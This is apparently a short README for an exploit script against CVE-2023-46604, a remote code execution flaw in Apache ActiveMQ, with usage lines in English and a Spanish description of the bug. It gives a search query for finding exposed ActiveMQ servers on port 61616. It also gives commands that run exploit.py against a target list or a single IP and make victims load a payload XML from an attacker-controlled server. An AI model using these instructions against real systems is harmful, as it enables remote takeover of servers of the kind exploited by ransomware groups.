
Exploit para CVE-2023-46604
Exploit para CVE-2023-46604
product:"ActiveMQ" port:"61616"
for read targets from the file:
python3 exploit.py -f targets -c http://YourVPS/poc.xml
---
single target:
python3 exploit.py -ip IP -c http://YourVPS/poc.xml
CVE-2023-46604 es una vulnerabilidad crítica de ejecución remota de código en Apache ActiveMQ, un software de broker de mensajes de código abierto. Esta vulnerabilidad permite que un atacante remoto con acceso a la red, ya sea a un broker o cliente OpenWire basado en Java, ejecute comandos arbitrarios de shell. Esto se logra manipulando los tipos de clases serializadas en el protocolo OpenWire, lo que provoca que el broker instancie cualquier clase en el classpath. La vulnerabilidad se debe a una deserialización insegura en Apache ActiveMQ y ha sido explotada por atacantes, incluida la familia de ransomware HelloKitty, para ejecutar binarios de ransomware y comprometer completamente los sistemas.